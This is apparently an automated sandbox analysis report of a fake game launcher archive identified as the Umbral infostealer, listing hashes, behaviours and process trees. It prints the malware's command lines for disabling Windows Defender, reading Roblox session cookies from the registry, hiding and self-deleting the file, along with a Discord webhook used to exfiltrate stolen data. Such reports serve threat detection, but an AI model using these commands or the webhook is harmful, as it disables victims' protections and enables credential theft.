Analysis
-
max time kernel
40s -
max time network
38s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-06-2024 14:53
General
-
Target
ElectricLauncher.7z
-
Size
51.7MB
-
MD5
82acc0fd6a29645595b2cc235b1291d6
-
SHA1
f76feb791082c7a835f7f09b547cd3a158b334fc
-
SHA256
367a357e41829b8e57dfc83d516eef9f6280826967db5b5b92fe9514e84de368
-
SHA512
631187f289efec321aaf773e5e30ccc24b4b40d86b947dcb578e87a47f51ea6d656d1b248b5ac4b417166919105d3234debab0569add4f7fac037ac739ce49f2
-
SSDEEP
1572864:ILfAxxnZhdeF5qvIH6Bifh/YocC4RzICSVL0TXjSjH3K:ILoxtYF0IaBilTcCVC44TiH3K
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1254415293199945749/fmmqbkHSip_I3fhu39jloEA38uyrT0z1u8S8mtWIh9LGi-fMXG8TKLssPsqFrn6Y_pNZ
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000100000002abe2-566.dat family_umbral behavioral1/memory/4440-568-0x0000021A63990000-0x0000021A63A12000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4832 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Launcher.exe -
Executes dropped EXE 2 IoCs
pid Process 4440 Launcher.exe 1656 Uninstall.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 discord.com 15 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2296 wmic.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings OpenWith.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4464 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4440 Launcher.exe 4832 powershell.exe 4832 powershell.exe 3900 powershell.exe 3900 powershell.exe 3420 powershell.exe 3420 powershell.exe 1388 powershell.exe 1388 powershell.exe 3828 powershell.exe 3828 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4916 OpenWith.exe 544 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 544 7zFM.exe Token: 35 544 7zFM.exe Token: SeSecurityPrivilege 544 7zFM.exe Token: SeDebugPrivilege 4440 Launcher.exe Token: SeIncreaseQuotaPrivilege 4876 wmic.exe Token: SeSecurityPrivilege 4876 wmic.exe Token: SeTakeOwnershipPrivilege 4876 wmic.exe Token: SeLoadDriverPrivilege 4876 wmic.exe Token: SeSystemProfilePrivilege 4876 wmic.exe Token: SeSystemtimePrivilege 4876 wmic.exe Token: SeProfSingleProcessPrivilege 4876 wmic.exe Token: SeIncBasePriorityPrivilege 4876 wmic.exe Token: SeCreatePagefilePrivilege 4876 wmic.exe Token: SeBackupPrivilege 4876 wmic.exe Token: SeRestorePrivilege 4876 wmic.exe Token: SeShutdownPrivilege 4876 wmic.exe Token: SeDebugPrivilege 4876 wmic.exe Token: SeSystemEnvironmentPrivilege 4876 wmic.exe Token: SeRemoteShutdownPrivilege 4876 wmic.exe Token: SeUndockPrivilege 4876 wmic.exe Token: SeManageVolumePrivilege 4876 wmic.exe Token: 33 4876 wmic.exe Token: 34 4876 wmic.exe Token: 35 4876 wmic.exe Token: 36 4876 wmic.exe Token: SeIncreaseQuotaPrivilege 4876 wmic.exe Token: SeSecurityPrivilege 4876 wmic.exe Token: SeTakeOwnershipPrivilege 4876 wmic.exe Token: SeLoadDriverPrivilege 4876 wmic.exe Token: SeSystemProfilePrivilege 4876 wmic.exe Token: SeSystemtimePrivilege 4876 wmic.exe Token: SeProfSingleProcessPrivilege 4876 wmic.exe Token: SeIncBasePriorityPrivilege 4876 wmic.exe Token: SeCreatePagefilePrivilege 4876 wmic.exe Token: SeBackupPrivilege 4876 wmic.exe Token: SeRestorePrivilege 4876 wmic.exe Token: SeShutdownPrivilege 4876 wmic.exe Token: SeDebugPrivilege 4876 wmic.exe Token: SeSystemEnvironmentPrivilege 4876 wmic.exe Token: SeRemoteShutdownPrivilege 4876 wmic.exe Token: SeUndockPrivilege 4876 wmic.exe Token: SeManageVolumePrivilege 4876 wmic.exe Token: 33 4876 wmic.exe Token: 34 4876 wmic.exe Token: 35 4876 wmic.exe Token: 36 4876 wmic.exe Token: SeDebugPrivilege 4832 powershell.exe Token: SeDebugPrivilege 3900 powershell.exe Token: SeDebugPrivilege 3420 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeIncreaseQuotaPrivilege 4616 wmic.exe Token: SeSecurityPrivilege 4616 wmic.exe Token: SeTakeOwnershipPrivilege 4616 wmic.exe Token: SeLoadDriverPrivilege 4616 wmic.exe Token: SeSystemProfilePrivilege 4616 wmic.exe Token: SeSystemtimePrivilege 4616 wmic.exe Token: SeProfSingleProcessPrivilege 4616 wmic.exe Token: SeIncBasePriorityPrivilege 4616 wmic.exe Token: SeCreatePagefilePrivilege 4616 wmic.exe Token: SeBackupPrivilege 4616 wmic.exe Token: SeRestorePrivilege 4616 wmic.exe Token: SeShutdownPrivilege 4616 wmic.exe Token: SeDebugPrivilege 4616 wmic.exe Token: SeSystemEnvironmentPrivilege 4616 wmic.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 544 7zFM.exe 544 7zFM.exe 1656 Uninstall.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 4916 OpenWith.exe 1656 Uninstall.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 4440 wrote to memory of 4876 4440 Launcher.exe 90 PID 4440 wrote to memory of 4876 4440 Launcher.exe 90 PID 4440 wrote to memory of 3128 4440 Launcher.exe 93 PID 4440 wrote to memory of 3128 4440 Launcher.exe 93 PID 4440 wrote to memory of 4832 4440 Launcher.exe 95 PID 4440 wrote to memory of 4832 4440 Launcher.exe 95 PID 4440 wrote to memory of 3900 4440 Launcher.exe 97 PID 4440 wrote to memory of 3900 4440 Launcher.exe 97 PID 4440 wrote to memory of 3420 4440 Launcher.exe 99 PID 4440 wrote to memory of 3420 4440 Launcher.exe 99 PID 4440 wrote to memory of 1388 4440 Launcher.exe 101 PID 4440 wrote to memory of 1388 4440 Launcher.exe 101 PID 4440 wrote to memory of 4616 4440 Launcher.exe 103 PID 4440 wrote to memory of 4616 4440 Launcher.exe 103 PID 4440 wrote to memory of 1268 4440 Launcher.exe 105 PID 4440 wrote to memory of 1268 4440 Launcher.exe 105 PID 4440 wrote to memory of 4448 4440 Launcher.exe 107 PID 4440 wrote to memory of 4448 4440 Launcher.exe 107 PID 4440 wrote to memory of 3828 4440 Launcher.exe 109 PID 4440 wrote to memory of 3828 4440 Launcher.exe 109 PID 4440 wrote to memory of 2296 4440 Launcher.exe 111 PID 4440 wrote to memory of 2296 4440 Launcher.exe 111 PID 4440 wrote to memory of 2932 4440 Launcher.exe 113 PID 4440 wrote to memory of 2932 4440 Launcher.exe 113 PID 2932 wrote to memory of 4464 2932 cmd.exe 115 PID 2932 wrote to memory of 4464 2932 cmd.exe 115 PID 1656 wrote to memory of 1460 1656 Uninstall.exe 118 PID 1656 wrote to memory of 1460 1656 Uninstall.exe 118 PID 1656 wrote to memory of 1460 1656 Uninstall.exe 118 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3128 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ElectricLauncher.7z1⤵
- Modifies registry class
PID:3392
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4916
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:432
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\ElectricLauncher.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:544
-
C:\Users\Admin\Desktop\ElectricLauncher\Launcher.exe"C:\Users\Admin\Desktop\ElectricLauncher\Launcher.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\Desktop\ElectricLauncher\Launcher.exe"2⤵
- Views/modifies file attributes
PID:3128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\ElectricLauncher\Launcher.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1268
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:4448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3828
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2296
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\ElectricLauncher\Launcher.exe" && pause2⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:4464
-
-
-
C:\Users\Admin\Desktop\ElectricLauncher\Uninstall.exe"C:\Users\Admin\Desktop\ElectricLauncher\Uninstall.exe"1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{95D077D6-9483-406F-9506-FC101B8A6418}.bat" "2⤵PID:1460
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD5d0a4a3b9a52b8fe3b019f6cd0ef3dad6
SHA1fed70ce7834c3b97edbd078eccda1e5effa527cd
SHA25621942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
SHA5121a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b
-
Filesize
948B
MD5ff2b893dca47bb33eda469a0bd0aa228
SHA1a4c48afb57ed9bd12f4a314c78c018692fc74f04
SHA25646711f5517ef17bef720c97e361413c510becb1ba2c5f610ee8ff68b05af6c11
SHA512ae6e525cb1c85bca5d834d49241f1666cdf6bd5b44b271effb23ceec0a3af8a529d0553f059bea4ddefae963e7ac282752ade3a76e5d19360faf38342c4e6287
-
Filesize
1KB
MD57332074ae2b01262736b6fbd9e100dac
SHA122f992165065107cc9417fa4117240d84414a13c
SHA256baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA5124ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2
-
Filesize
1KB
MD553200a998b0f830eb3925a2a18f868d2
SHA1f132dceddae917677fe0cddece4b966fe11d8de1
SHA25689980ee972937ad4c08a27022d21f0c4f96686d2e94e5a9e2a746091a9b676d6
SHA512cee718002049499ada80fafcc7c5a3df41ac80e9c0a50754f17cacfa3f65e94de6d802952d48c9a9d05f3ef7860d363b1ed3167fd3c3e96c91185645bd4037c1
-
C:\Users\Admin\AppData\Local\Temp\7zE0221FEF7\ElectricLauncher\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif
Filesize153B
MD51e9d8f133a442da6b0c74d49bc84a341
SHA1259edc45b4569427e8319895a444f4295d54348f
SHA2561a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b
SHA51263d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
306B
MD5554668d2eb936273c64f661b362ae677
SHA16750982423968b071ef9b02f38864eed4087ed82
SHA256a8ddfd0ce751edbf03a1ba1025957cb0c930452fcf5daa609afc6757852b41f8
SHA5120e10acc6b83702aaa452e8eae67847c24847c931cfcb68cc5bf43538673433ce58feed2962f1bbdbf925b120d64cc5906d8023b29c748d0a12e19ba2fe329b75
-
Filesize
495KB
MD52648970fc0ace5cd98c8747ee6cbed89
SHA10bc557861f31fa53f833445ffda7956a11512b5f
SHA256f106db43435ccb4b54d47d153a8c105e30fb8b41eb921816ef0198b7a23b5c16
SHA5122ee08c11db9aaf1a568ff4182a6e913fda658e3fe0ece1e208fe1325d12a2b55943ba355158069e9306249911e581a6e4882bc52e9a45cd5466cc1fdf986a199
-
Filesize
38KB
MD52c38ab9b3408686a4da0cb668e02272b
SHA172a432f96b8c5eaba00f9d8028bfed3db5c628b1
SHA256ab2d616e27a869e552cee47316e1febed41df9da3b05d37c6cb63e0facbf9711
SHA5124f85b8173b7f79791f681efbee1f4d34f8d1adfae703eba091ef122adc8f329d1d2af3c9534631b1b342d73155a222c46abab42f1b78f8cc3f425ae09e49857d
-
Filesize
1.1MB
MD587f8b2e3dcb20d80a1473d377b81a63e
SHA156b6c8373ed4fe78bc4c61be5ea4ed10e272c011
SHA256317c2998f31db18a22b9a904f4cd46b2ced56834f9ab0f2f1bff0ef5ba1aae68
SHA51222e74ad2f07a8d49b0cd0dd4ee9f91de0892cca405150ef90a7f20eb406c6fda5597a116ca921bcad2dca0cf9134ec49e64523dd750fb3c395053362acdc4948
-
Filesize
5KB
MD564c659be1e64b89a82af00eb507ecdf5
SHA1b339f7c0a53db0e30f78b67165fa4a1be098293a
SHA256920eaa3b65f993405d185361ba2faafb601596d1d3f2527ba18d1969a547f483
SHA51235097e2a31813ff97befe7e49fcb337dc531799d2566e79c484a487370407561ef5acbf91cef956beea2e4c20560582a76750d924bbda31819ccfe957a6afc82